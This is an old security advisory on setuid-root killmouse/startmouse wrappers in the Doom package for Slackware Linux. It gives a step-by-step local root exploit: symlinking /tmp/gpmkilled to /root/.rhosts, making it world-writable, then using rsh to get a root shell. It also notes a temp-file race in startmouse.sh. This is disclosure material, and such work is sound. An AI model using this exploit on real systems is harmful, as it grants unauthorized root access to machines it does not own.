COMMAND
/usr/games/doom/killmouse
SYSTEMS AFFECTED
Slackware 3.0, other distributions might be too.
PROBLEM
The problem is the killmouse/startmouse command that is part
of Doom package on Linux systems. It is actually a
C-wrapper that runs two scripts (killmouse.sh/startmouse.sh). It
runs suid root. Thnx to Bo (bo@ebony.iaehv.nl) who originally
posted this.
/usr/games/doom/startmouse.sh:
#!/bin/sh
if [ -r /tmp/gpmkilled ]; then
/usr/bin/grep gpm /etc/rc.d/rc.local > /tmp/gpmscript
/bin/sh /tmp/gpmscript; /bin/rm /tmp/gpmscript /tmp/gpmkilled
fi
/usr/games/doom/killmouse.sh:
#!/bin/sh
if /bin/ps ax | /usr/bin/grep -v grep | /usr/bin/grep "gpm" ; then
GPM_RUNNING=true; /bin/killall gpm; /bin/touch /tmp/gpmkilled
fi
This can be exploited in a few similar ways. Here's just
one. Let's assume the gpm utility is not running. We can't
start it up ourselves as gpm is only to be run by root. So we'll
use startmouse to fire it up:
$ touch /tmp/gpmkilled
$ /usr/games/doom/startmouse
ps -aux | grep gpm
bo 1436 0.0 2.0 40 312 v03 R 16:33 0:00 grep gpm
root 1407 0.0 2.4 42 368 ? S 16:24 0:00 /usr/bin/gpm t ms
Fine, it's running. Now we'll use killmouse to kill the
process, but first we set our umask to 0 and link /tmp/gpmkilled
to /root/.rhosts:
$ umask 0
$ ln -s /root/.rhosts /tmp/gpmkilled
$ /usr/games/doom/killmouse
1407 ? S 0:00 gpm t ms
$ ls -l /root/.rhosts
-rw-rw-rw- 1 root users 0 Dec 13 16:44 /root/.rhosts
$ echo localhost bo > /root/.rhosts
$ rsh -l root localhost sh -i
bash#
On some systems gpm might not be started in /etc/rc.d/rc.local
so the startmouse script will fail. But gpm might be running
already. If neither of these conditions are met, note that
startmouse.sh creates /tmp/gpmscript and runs it in a shell.
There's a window of time between creating the script and
executing it, so we have a nice race condition here; it can be
replaced with anything you like prior to execution.
SOLUTION
Remove setuid bits of killmouse/startmouse. Better yet -
nuke them. While your at it, nuke Doom too - it's a stupid game
anyway :-)